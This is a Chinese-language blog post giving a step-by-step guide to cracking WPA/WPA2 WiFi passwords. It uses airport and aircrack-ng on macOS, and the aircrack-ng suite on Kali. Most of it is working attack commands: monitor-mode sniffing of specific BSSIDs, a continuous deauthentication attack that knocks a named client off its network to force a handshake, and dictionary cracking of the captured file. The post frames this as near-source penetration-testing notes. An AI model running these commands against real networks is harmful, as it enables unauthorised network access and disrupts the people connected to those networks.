破解wifi两种方式

前言

近源可能会用到wifi破解相关姿势,记录下通过mac和kali抓wifi握手包进行破解的步骤。

MAC破解wifi

安装aircrack-ng

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。

brew install aircrack-ng

通过airport查看周围wifi

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

airport -s

image-20221228150148049

通过airport抓取握手包

主要看上面的bssid值和CH信道值。

airport en0 sniff 36

通过airport开启嗅探,en0为自己网卡,36为上面的信道值。

且图标变监听状态

image-20221101143116678

等一段时间,有人连接目标wifi后,通过aircrack-ng分析保存的cap文件:

image-20221101143914843

aircrack-ng airportSniff6kSmIs.cap | grep "handshake"

image-20221228150300368

在36信道有两个wifi抓到了握手包

通过aircrack-ng暴力破解

aircrack-ng -w pass.txt -b 74:83:C2:38:23:D5 airportSniff6kSmIs.cap

image-20221228150321391

kali破解方式

kali虚拟机链接网卡

最好买免驱的,即插即用的网卡

image-20221101171122800

查看网卡

airmon-ng /iwconfig

1

开启网卡监听

airmon-ng start wlan0

2

扫描wifi信息

airodump-ng wlan0mon

image-20221228150407688

airodump-ng监听握手包

airodump-ng -w test -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa

-c:指定信道
-w:指定抓去握手包的存放位置或者名字
–bssid:指定路由器的MAC

image-20221228150432387

反认证攻击强制设备重连

相较于mac通过airport只能被动的监听,kali里面支持通过aireplay-ng进行反认证攻击强制扫描到的设备进行重连抓取握手包。(一边监听,一边进行反认证攻击)

aireplay-ng -0 0 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon

-a:指定路由器的MAC

-c:指定客户机的MAC

-0: 0指不间断发起反认证包。

image-20221228150512967

之后可以看到收到handshake。

破解握手包

aircrack-ng -w pass.txt ct.cap

image-20221228150531222

image-20221228150559001

特点

  • 破解成功取决于字典厚度
  • 通过airport抓握手包不需要装无线网卡,但是没有抓到握手包的提醒,只能看运气
  • kali可以进行反认证攻击,强制抓到握手包。

参考

https://wifi-crack.readthedocs.io/en/latest/Wifi破解.html

https://blog.csdn.net/hjd2525316/article/details/105846379

https://leexuan.github.io/2020/06/Kali+Airmon+WiFi破解/

posted @ 2022-11-06 15:59  N0r4h  阅读(3250)  评论(0)    收藏  举报